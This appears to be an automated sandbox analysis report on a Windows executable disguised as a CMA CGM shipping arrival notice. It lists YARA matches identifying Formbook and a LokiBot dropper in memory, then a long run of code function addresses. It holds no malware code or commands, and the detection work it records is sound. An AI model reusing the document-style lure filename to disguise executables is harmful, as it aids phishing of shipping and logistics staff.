      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781055
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4F6
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B52A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00793504
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A83B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781EEB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078907D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A058
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786059
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00783050
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A03A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C03F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007890CD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C0B4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782098
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786140
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789144
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078211D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007811E1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007881E4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007841E7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C1D8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C1BD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007821A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781278
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786259
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078423D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782218
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786218
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789214
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007812EF
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007822D8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007862DC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892D0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789295
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078228D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078136C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785360
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782338
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789339
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785330
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007863DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007813D5
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007823B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007893A8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786389
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788461
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786459
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781453
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789431
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786434
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078242C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864FC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007824EE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007824B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007894B9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007884BB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4BD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864A9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788490
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B491
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789560
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789537
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078752F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007865E8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007825E9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007855D9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B5BC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786589
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786671
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789668
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078766D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782640
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785635
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B628
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007856F1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007896E9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007876C9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007826A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B6A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782770
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00787758
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078575F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786754
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782715
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786701
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007847F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007867FD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007807F1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007827ED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007817D9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007857D5
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007877C4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007807BB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007847A4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789783
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786868
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00784865
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078185B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782855
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00787849
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780834
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789829
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078682C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007908ED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007858DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007868DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007828CC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007898A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078089F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785895
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780979
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790960
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078293C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078991F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791915
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078990D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780903
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889FB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007919B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007899BC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007829B1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889AC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788A7C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FA5F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791A31
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782A34
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A21
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790A01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791AE1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788AE1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789AC7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782AA4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A94
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B7C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790B51
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788B54
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791B39
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782B1B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B14
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FB01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789BF8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078EBE8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790BED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780B90
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791C79
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789C60
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790C5D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780C4D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788C45
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780C2A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791C1C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782C10
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790C15
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782CED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791CD9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780CD0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788CB8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789CA0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782C88
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BD69
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791D61
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780D5C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789D49
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788D40
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790D44
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780D2C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078DD10
